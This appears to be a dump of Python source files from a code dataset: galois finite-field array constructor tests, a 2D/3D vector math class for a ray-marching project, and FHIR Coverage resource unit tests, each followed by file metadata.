@pytest.mark.parametrize("type1", [int, list, tuple, np.array, galois.FieldArray])
def test_new(self, field, type1):
v = int(field.Random())
vt = convert_0d(v, type1, field)
a = field(vt)
assert type(a) is field
assert a == v
@pytest.mark.parametrize("type1", [int, list, tuple, np.array, galois.FieldArray])
def test_valid_dtype(self, field, type1):
v = int(field.Random())
vt = convert_0d(v, type1, field)
dtype = valid_dtype(field)
a = field(vt, dtype=dtype)
assert type(a) is field
assert a.dtype == dtype
assert a == v
@pytest.mark.parametrize("type1", [int, list, tuple, np.array, galois.FieldArray])
def test_invalid_dtype(self, field, type1):
v = int(field.Random())
vt = convert_0d(v, type1, field)
dtype = invalid_dtype(field)
with pytest.raises(TypeError):
a = field(vt, dtype=dtype)
@pytest.mark.parametrize("type1", [int, list, tuple, np.array])
def test_non_integer(self, field, type1):
v = float(field.order)
vt = convert_0d(v, type1, field)
with pytest.raises((TypeError, ValueError)):
a = field(vt)
@pytest.mark.parametrize("type1", [int, list, tuple, np.array])
def test_out_of_range_low(self, field, type1):
v = -1
vt = convert_0d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
@pytest.mark.parametrize("type1", [int, list, tuple, np.array])
def test_out_of_range_high(self, field, type1):
v = field.order
vt = convert_0d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
def test_copy_true(self, field):
v = int(field.Random(low=1))
va = np.array(v, dtype=field.dtypes[0])
a = field(va, copy=True)
assert type(a) is field
assert array_equal(a, v)
va = 1 # Change original array
assert array_equal(a, v)
def test_default_order_c(self, field):
v = int(field.Random())
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_default_order_f(self, field):
v = int(field.Random())
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_order_c(self, field):
v = int(field.Random())
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va, order="C")
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_order_f(self, field):
v = int(field.Random())
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va, order="F")
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_ndmin(self, field):
v = int(field.Random())
a = field(v, ndmin=3)
assert type(a) is field
assert a.shape == (1,1,1)
class Test1D:
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_new(self, field, type1):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
a = field(vt)
assert type(a) is field
assert array_equal(a, v)
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_valid_dtype(self, field, type1):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
dtype = valid_dtype(field)
a = field(vt, dtype=dtype)
assert type(a) is field
assert a.dtype == dtype
assert array_equal(a, v)
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_invalid_dtype(self, field, type1):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
dtype = invalid_dtype(field)
with pytest.raises(TypeError):
a = field(vt, dtype=dtype)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_non_integer(self, field, type1):
v = [int(field.Random()), float(field.Random()), int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
with pytest.raises((TypeError, ValueError)):
a = field(vt)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_out_of_range_low(self, field, type1):
v = [int(field.Random()), -1, int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_out_of_range_high(self, field, type1):
v = [int(field.Random()), field.order, int(field.Random()), int(field.Random())]
vt = convert_1d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
def test_copy_true(self, field):
v = [int(field.Random(low=1)), int(field.Random()), int(field.Random()), int(field.Random())]
va = np.array(v, dtype=field.dtypes[0])
a = field(va, copy=True)
assert type(a) is field
assert array_equal(a, v)
va[0] = 0 # Change original array
assert array_equal(a, v)
def test_default_order_c(self, field):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_default_order_f(self, field):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_order_c(self, field):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va, order="C")
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_order_f(self, field):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va, order="F")
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_ndmin(self, field):
v = [int(field.Random()), int(field.Random()), int(field.Random()), int(field.Random())]
a = field(v, ndmin=3)
assert type(a) is field
assert a.shape == (1,1,4)
class Test2D:
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_new(self, field, type1):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
a = field(vt)
assert type(a) is field
assert array_equal(a, v)
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_valid_dtype(self, field, type1):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
dtype = valid_dtype(field)
a = field(vt, dtype=dtype)
assert type(a) is field
assert a.dtype == dtype
assert array_equal(a, v)
@pytest.mark.parametrize("type1", [list, tuple, np.array, galois.FieldArray])
def test_invalid_dtype(self, field, type1):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
dtype = invalid_dtype(field)
with pytest.raises(TypeError):
a = field(vt, dtype=dtype)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_non_integer(self, field, type1):
v = [[int(field.Random()), float(field.Random())], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
with pytest.raises((TypeError, ValueError)):
a = field(vt)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_out_of_range_low(self, field, type1):
v = [[int(field.Random()), -1], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
@pytest.mark.parametrize("type1", [list, tuple, np.array])
def test_out_of_range_high(self, field, type1):
v = [[int(field.Random()), field.order], [int(field.Random()), int(field.Random())]]
vt = convert_2d(v, type1, field)
with pytest.raises(ValueError):
a = field(vt)
def test_copy_true(self, field):
v = [[int(field.Random(low=1)), int(field.Random())], [int(field.Random()), int(field.Random())]]
va = np.array(v, dtype=field.dtypes[0])
a = field(va, copy=True)
assert type(a) is field
assert array_equal(a, v)
va[0][0] = 0 # Change original array
assert array_equal(a, v)
def test_default_order_c(self, field):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert not a.flags["F_CONTIGUOUS"]
def test_default_order_f(self, field):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va) # Default order is "K" which keeps current
assert type(a) is field
assert not a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_order_c(self, field):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
va = np.array(v, order="F", dtype=field.dtypes[0])
a = field(va, order="C")
assert type(a) is field
assert a.flags["C_CONTIGUOUS"]
assert not a.flags["F_CONTIGUOUS"]
def test_order_f(self, field):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
va = np.array(v, order="C", dtype=field.dtypes[0])
a = field(va, order="F")
assert type(a) is field
assert not a.flags["C_CONTIGUOUS"]
assert a.flags["F_CONTIGUOUS"]
def test_ndmin(self, field):
v = [[int(field.Random()), int(field.Random())], [int(field.Random()), int(field.Random())]]
a = field(v, ndmin=3)
assert type(a) is field
assert a.shape == (1,2,2)
def convert_0d(v, type1, field):
if type1 is int:
vt = v
elif type1 in [list, tuple]:
vt = type1([v])
elif type1 is np.array and field.dtypes == [np.object_]:
vt = np.array(v, dtype=np.object_)
elif type1 is np.array:
vt = np.array(v)
elif type1 is galois.FieldArray:
vt = field(v)
else:
raise NotImplementedError
return vt
def convert_1d(v, type1, field):
if type1 is galois.FieldArray:
vt = field(v)
elif type1 is np.array and field.dtypes == [np.object_]:
vt = np.array(v, dtype=np.object_)
elif type1 is np.array:
vt = np.array(v)
else:
vt = type1(v)
return vt
def convert_2d(v, type1, field):
if type1 is galois.FieldArray:
vt = field(v)
elif type1 is np.array and field.dtypes == [np.object_]:
vt = np.array(v, dtype=np.object_)
elif type1 is np.array:
vt = np.array(v)
elif type1 in [list, tuple]:
vt = type1([type1([b for b in a]) for a in v])
else:
raise NotImplementedError
return vt
def valid_dtype(field):
return random.choice(field.dtypes)
def invalid_dtype(field):
return random.choice([dtype for dtype in DTYPES if dtype not in field.dtypes])
| 37.066852 | 105 | 0.596228 | 1,882 | 13,307 | 4.131775 | 0.050478 | 0.142876 | 0.178241 | 0.146605 | 0.947402 | 0.936728 | 0.934156 | 0.920653 | 0.914738 | 0.914738 | 0 | 0.013978 | 0.247313 | 13,307 | 358 | 106 | 37.170391 | 0.76238 | 0.028406 | 0 | 0.852843 | 0 | 0 | 0.030667 | 0 | 0 | 0 | 0 | 0 | 0.220736 | 1 | 0.140468 | false | 0 | 0.016722 | 0.006689 | 0.183946 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f79f79af309f580a1137b7246b19f55368becc00 | 12,230 | py | Python | vector_class.py | hamolicious/Ray-Marching | d4713b86ed7911b368137d455c288c9ef0b5bdee | [
"Apache-2.0"
] | 1 | 2021-06-08T21:07:33.000Z | 2021-06-08T21:07:33.000Z | vector_class.py | hamolicious/Ray-Marching | d4713b86ed7911b368137d455c288c9ef0b5bdee | [
"Apache-2.0"
] | null | null | null | vector_class.py | hamolicious/Ray-Marching | d4713b86ed7911b368137d455c288c9ef0b5bdee | [
"Apache-2.0"
] | null | null | null | from math import atan2, sqrt, degrees, radians, cos, sin
from random import randint
class Vector2D:
#region INIT
def _get_xy(self, args):
        """Generates an x and y from any input
Returns:
[tuple]: x, y
"""
number_of_args = len(args)
if number_of_args == 0 : return 0, 0 # no arguments
elif number_of_args == 2 : x, y = args ; return x, y # both x and y passed in
if number_of_args == 1: # one argument
arg_type = type(args[0])
if arg_type is float or arg_type is int: # single int or float argument
return args[0], args[0]
if arg_type is list or arg_type is tuple:
return args[0][0], args[0][1] # single list argument
if arg_type is Vector2D:
return args[0].x, args[0].y
def __init__(self, *args):
self.x, self.y = self._get_xy(args)
self.data = {}
#endregion
#region AUTO CREATE METHODS
def random_pos():
"""Returns a vector in normalised 0-1 space
Returns:
Vector2D: a vector in normal space
"""
return Vector2D(randint(0, 1000)/1000, randint(0, 1000)/1000)
def random_unit():
"""Generates a unit vector with a random heading
Returns:
Vector2D: unit vector
"""
pos = Vector2D(randint(-1000, 1000), randint(-1000, 1000))
pos.normalise()
return pos
def from_angle(angle):
"""Creates a unit vector with the same heading as the angle
Args:
angle (float): angle of direction in radians
Returns:
Vector2D: unit vector
"""
return Vector2D(cos(angle), sin(angle))
#endregion
#region CUSTOM METHODS
def get(self):
"""Gets the x and y components as an integer tuple
Returns:
tuple: contains x and y as integers
"""
return (int(self.x), int(self.y))
def set(self, *args):
"""Sets the x and y components
"""
x, y = self._get_xy(args)
self.x = x ; self.y = y
def copy(self):
"""Gets a copy of this vector
Returns:
Vector2D: a copy of this vector
"""
return Vector2D(self.x, self.y)
def clear(self):
"""Sets both components to 0
"""
self.x = self.y = 0
#endregion
#region CUSTOM MATHEMATICAL METHODS
def dist_sqrt(self, *args):
"""Gets the distance between this point and another (uses square root)
Returns:
float: distance
"""
x, y = self._get_xy(args)
return sqrt((self.x - x)**2 + (self.y - y)**2)
def dist(self, *args):
"""Gets the distance between this point and another (does not use square root)
Returns:
float: distance
"""
x, y = self._get_xy(args)
return (self.x - x)**2 + (self.y - y)**2
def get_heading_angle(self):
"""Returns the heading angle in radians assuming 0 is aligned with x
Returns:
float: angle in radians
"""
        return atan2(self.y, self.x)
def get_magnitude(self):
"""Gets the magnitude/length of the vector
Returns:
float: magnitude
"""
return sqrt(self.x**2 + self.y**2)
def normalise(self):
"""Normalises this vector making it a unit vector
"""
mag = self.get_magnitude()
self.div(mag)
def normalize(self):
"""Normalises this vector making it a unit vector
"""
self.normalise()
def truncate(self, max_val):
"""Clamps the x and y components to be in range -max_val to max_val
Args:
max_val (float): max and min for each component
"""
if self.x > max_val : self.x = max_val
if self.y > max_val : self.y = max_val
if self.x < -max_val : self.x = -max_val
if self.y < -max_val : self.y = -max_val
def add(self, *args):
x, y = self._get_xy(args)
self.x += x ; self.y += y
    def sub(self, *args):
        x, y = self._get_xy(args)
        self.x -= x ; self.y -= y
def mult(self, *args):
x, y = self._get_xy(args)
self.x *= x ; self.y *= y
def div(self, *args):
x, y = self._get_xy(args)
self.x /= x ; self.y /= y
def linear_interpolate(self, *args, t=0.5):
"""Linearly interpolates between current position and passed in position
Args:
t (float, optional): speed. Defaults to 0.5.
"""
x, y = self._get_xy(args)
        x = self.x + t * (x - self.x)
        y = self.y + t * (y - self.y)
self.set(x, y)
def dot_product(self, *args):
"""Dot product of this and another vector
Returns:
float: dot product result
"""
x, y = self._get_xy(args)
return sum([self.x * x, self.y * y])
#endregion
#region MAGIC METHODS
def __iadd__(self, *args):
x, y = self._get_xy(args)
self.x += x ; self.y += y
return self
    def __isub__(self, *args):
        x, y = self._get_xy(args)
        self.x -= x ; self.y -= y
        return self
def __imul__(self, *args):
x, y = self._get_xy(args)
self.x *= x ; self.y *= y
return self
    def __itruediv__(self, *args):
x, y = self._get_xy(args)
self.x /= x ; self.y /= y
return self
def __add__(self, *args):
x, y = self._get_xy(args)
return Vector2D(self.x + x, self.y + y)
def __sub__(self, *args):
x, y = self._get_xy(args)
return Vector2D(self.x - x, self.y - y)
def __mul__(self, *args):
x, y = self._get_xy(args)
return Vector2D(self.x * x, self.y * y)
    def __truediv__(self, *args):
x, y = self._get_xy(args)
return Vector2D(self.x / x, self.y / y)
#endregion
class Vector3D:
#region INIT
def _get_xyz(self, args):
        """Generates an x, y and z from any input
Returns:
[tuple]: x, y, z
"""
number_of_args = len(args)
if number_of_args == 0 : return 0, 0, 0 # no arguments
        elif number_of_args == 3 : x, y, z = args ; return x, y, z # x, y and z passed in
if number_of_args == 1: # one argument
arg_type = type(args[0])
if arg_type is float or arg_type is int: # single int or float argument
return args[0], args[0], args[0]
if arg_type is list or arg_type is tuple:
return args[0][0], args[0][1], args[0][2] # single list argument
if arg_type is Vector3D:
return args[0].x, args[0].y, args[0].z
def __init__(self, *args):
self.x, self.y, self.z = self._get_xyz(args)
self.data = {}
#endregion
#region AUTO CREATE METHODS
def random_pos():
"""Returns a vector in normalised 0-1 space
Returns:
            Vector3D: a vector in normal space
"""
return Vector3D(randint(0, 1000)/1000, randint(0, 1000)/1000, randint(0, 1000)/1000)
def random_unit():
"""Generates a unit vector with a random heading
Returns:
            Vector3D: unit vector
        """
        pos = Vector3D(randint(-1000, 1000), randint(-1000, 1000), randint(-1000, 1000))
pos.normalise()
return pos
#endregion
#region CUSTOM METHODS
def get(self):
        """Gets the x, y and z components as an integer tuple

        Returns:
            tuple: contains x, y and z as integers
        """
return (int(self.x), int(self.y), int(self.z))
def set(self, *args):
        """Sets the x, y and z components
"""
x, y, z = self._get_xyz(args)
self.x = x ; self.y = y ; self.z = z
def copy(self):
"""Gets a copy of this vector
Returns:
            Vector3D: a copy of this vector
        """
        return Vector3D(self.x, self.y, self.z)
def clear(self):
        """Sets all three components to 0
"""
self.x = self.y = self.z = 0
#endregion
#region CUSTOM MATHEMATICAL METHODS
def dist_sqrt(self, *args):
"""Gets the distance between this point and another (uses square root)
Returns:
float: distance
"""
x, y, z = self._get_xyz(args)
return sqrt((self.x - x)**2 + (self.y - y)**2 + (self.z - z)**2)
def dist(self, *args):
"""Gets the distance between this point and another (does not use square root)
Returns:
float: distance
"""
x, y, z = self._get_xyz(args)
return (self.x - x)**2 + (self.y - y)**2 + (self.z - z)**2
def get_magnitude(self):
"""Gets the magnitude/length of the vector
Returns:
float: magnitude
"""
return sqrt(self.x**2 + self.y**2 + self.z**2)
def normalise(self):
"""Normalises this vector making it a unit vector
"""
mag = self.get_magnitude()
self.div(mag)
def normalize(self):
"""Normalises this vector making it a unit vector
"""
self.normalise()
def truncate(self, max_val):
"""Clamps the x and y components to be in range -max_val to max_val
Args:
max_val (float): max and min for each component
"""
if self.x > max_val : self.x = max_val
if self.y > max_val : self.y = max_val
if self.z > max_val : self.z = max_val
if self.x < -max_val : self.x = -max_val
if self.y < -max_val : self.y = -max_val
if self.z < -max_val : self.z = -max_val
def add(self, *args):
x, y, z = self._get_xyz(args)
self.x += x ; self.y += y ; self.z += z
def sub(self, *args):
x, y, z = self._get_xyz(args)
self.x -= x ; self.y -= y ; self.z -= z
def mult(self, *args):
x, y, z = self._get_xyz(args)
self.x *= x ; self.y *= y ; self.z *= z
def div(self, *args):
x, y, z = self._get_xyz(args)
self.x /= x ; self.y /= y ; self.z /= z
def linear_interpolate(self, *args, t=0.5):
"""Linearly interpolates between current position and passed in position
Args:
t (float, optional): interpolation factor in [0, 1]. Defaults to 0.5.
"""
x, y, z = self._get_xyz(args)
x = self.x + t * (x - self.x)
y = self.y + t * (y - self.y)
z = self.z + t * (z - self.z)
self.set(x, y, z)
#endregion
#region MAGIC METHODS
def __iadd__(self, *args):
x, y, z = self._get_xyz(args)
self.x += x ; self.y += y ; self.z += z
return self
def __isub__(self, *args):
x, y, z = self._get_xyz(args)
self.x -= x ; self.y -= y ; self.z -= z
return self
def __imul__(self, *args):
x, y, z = self._get_xyz(args)
self.x *= x ; self.y *= y ; self.z *= z
return self
def __itruediv__(self, *args): # Python 3 dispatches /= to __itruediv__, not __idiv__
x, y, z = self._get_xyz(args)
self.x /= x ; self.y /= y ; self.z /= z
return self
def __add__(self, *args):
x, y, z = self._get_xyz(args)
return Vector3D(self.x + x, self.y + y, self.z + z)
def __sub__(self, *args):
x, y, z = self._get_xyz(args)
return Vector3D(self.x - x, self.y - y, self.z - z)
def __mul__(self, *args):
x, y, z = self._get_xyz(args)
return Vector3D(self.x * x, self.y * y, self.z * z)
def __truediv__(self, *args): # Python 3 dispatches / to __truediv__, not __div__
x, y, z = self._get_xyz(args)
return Vector3D(self.x / x, self.y / y, self.z / z)
#endregion
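The `_get_xyz` helper above dispatches on the number and type of its arguments. A standalone sketch of the same rules (the `get_xyz` name and the explicit `TypeError` are illustrative additions, not part of the class):

```python
# Minimal re-implementation of the Vector3D argument dispatch, shown in
# isolation so each accepted call shape is explicit.
def get_xyz(*args):
    """Resolve x, y, z from: no args, three scalars, one scalar,
    one list/tuple, or one vector-like object with .x/.y/.z."""
    if len(args) == 0:
        return 0, 0, 0                      # default to the origin
    if len(args) == 3:
        return args[0], args[1], args[2]    # x, y and z passed separately
    if len(args) == 1:
        a = args[0]
        if isinstance(a, (int, float)):
            return a, a, a                  # broadcast a single scalar
        if isinstance(a, (list, tuple)):
            return a[0], a[1], a[2]         # unpack a sequence
        return a.x, a.y, a.z                # another vector-like object
    raise TypeError("expected 0, 1 or 3 arguments")
```

Unlike the method above, this sketch raises rather than silently returning `None` for unsupported call shapes.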
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b on 2019-01-22.
# 2019, SMART Health IT.
import os
import io
import unittest
import json
from . import coverage
from .fhirdate import FHIRDate
class CoverageTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Coverage", js["resourceType"])
return coverage.Coverage(js)
def testCoverage1(self):
inst = self.instantiate_from("coverage-example-2.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage1(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage1(inst2)
def implCoverage1(self, inst):
self.assertEqual(inst.class_fhir[0].name, "Western Airlines")
self.assertEqual(inst.class_fhir[0].type.coding[0].code, "group")
self.assertEqual(inst.class_fhir[0].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[0].value, "WESTAIR")
self.assertEqual(inst.class_fhir[1].name, "Full Coverage: Medical, Dental, Pharmacy, Vision, EHC")
self.assertEqual(inst.class_fhir[1].type.coding[0].code, "plan")
self.assertEqual(inst.class_fhir[1].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[1].value, "BG4352")
self.assertEqual(inst.class_fhir[2].name, "Platinum")
self.assertEqual(inst.class_fhir[2].type.coding[0].code, "subplan")
self.assertEqual(inst.class_fhir[2].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[2].value, "D15C9")
self.assertEqual(inst.costToBeneficiary[0].exception[0].period.end.date, FHIRDate("2018-12-31").date)
self.assertEqual(inst.costToBeneficiary[0].exception[0].period.end.as_json(), "2018-12-31")
self.assertEqual(inst.costToBeneficiary[0].exception[0].period.start.date, FHIRDate("2018-01-01").date)
self.assertEqual(inst.costToBeneficiary[0].exception[0].period.start.as_json(), "2018-01-01")
self.assertEqual(inst.costToBeneficiary[0].exception[0].type.coding[0].code, "retired")
self.assertEqual(inst.costToBeneficiary[0].exception[0].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/ex-coverage-financial-exception")
self.assertEqual(inst.costToBeneficiary[0].type.coding[0].code, "gpvisit")
self.assertEqual(inst.costToBeneficiary[0].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-copay-type")
self.assertEqual(inst.costToBeneficiary[0].valueMoney.currency, "USD")
self.assertEqual(inst.costToBeneficiary[0].valueMoney.value, 20.0)
self.assertEqual(inst.dependent, "1")
self.assertEqual(inst.id, "7546D")
self.assertEqual(inst.identifier[0].system, "http://xyz.com/codes/identifier")
self.assertEqual(inst.identifier[0].value, "AB98761")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.network, "5")
self.assertEqual(inst.order, 2)
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.period.start.date, FHIRDate("2011-03-17").date)
self.assertEqual(inst.period.start.as_json(), "2011-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.subscriberId, "AB9876")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the coverage</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActCode")
def testCoverage2(self):
inst = self.instantiate_from("coverage-example-selfpay.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage2(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage2(inst2)
def implCoverage2(self, inst):
self.assertEqual(inst.id, "SP1234")
self.assertEqual(inst.identifier[0].system, "http://hospitalx.com/selfpayagreement")
self.assertEqual(inst.identifier[0].value, "SP12345678")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of a Self Pay Agreement.</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "pay")
self.assertEqual(inst.type.coding[0].display, "PAY")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-selfpay")
def testCoverage3(self):
inst = self.instantiate_from("coverage-example-ehic.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage3(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage3(inst2)
def implCoverage3(self, inst):
self.assertEqual(inst.id, "7547E")
self.assertEqual(inst.identifier[0].system, "http://ehic.com/insurer/123456789/member")
self.assertEqual(inst.identifier[0].value, "A123456780")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the European Health Insurance Card</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActCode")
def testCoverage4(self):
inst = self.instantiate_from("coverage-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage4(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage4(inst2)
def implCoverage4(self, inst):
self.assertEqual(inst.class_fhir[0].name, "Corporate Baker's Inc. Local #35")
self.assertEqual(inst.class_fhir[0].type.coding[0].code, "group")
self.assertEqual(inst.class_fhir[0].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[0].value, "CB135")
self.assertEqual(inst.class_fhir[1].name, "Trainee Part-time Benefits")
self.assertEqual(inst.class_fhir[1].type.coding[0].code, "subgroup")
self.assertEqual(inst.class_fhir[1].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[1].value, "123")
self.assertEqual(inst.class_fhir[2].name, "Full Coverage: Medical, Dental, Pharmacy, Vision, EHC")
self.assertEqual(inst.class_fhir[2].type.coding[0].code, "plan")
self.assertEqual(inst.class_fhir[2].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[2].value, "B37FC")
self.assertEqual(inst.class_fhir[3].name, "Includes afterlife benefits")
self.assertEqual(inst.class_fhir[3].type.coding[0].code, "subplan")
self.assertEqual(inst.class_fhir[3].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[3].value, "P7")
self.assertEqual(inst.class_fhir[4].name, "Silver: Family Plan spouse only")
self.assertEqual(inst.class_fhir[4].type.coding[0].code, "class")
self.assertEqual(inst.class_fhir[4].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[4].value, "SILVER")
self.assertEqual(inst.class_fhir[5].name, "Low deductable, max $20 copay")
self.assertEqual(inst.class_fhir[5].type.coding[0].code, "subclass")
self.assertEqual(inst.class_fhir[5].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[5].value, "Tier2")
self.assertEqual(inst.class_fhir[6].type.coding[0].code, "sequence")
self.assertEqual(inst.class_fhir[6].type.coding[0].system, "http://terminology.hl7.org/CodeSystem/coverage-class")
self.assertEqual(inst.class_fhir[6].value, "9")
self.assertEqual(inst.class_fhir[7].type.coding[0].code, "rxid")
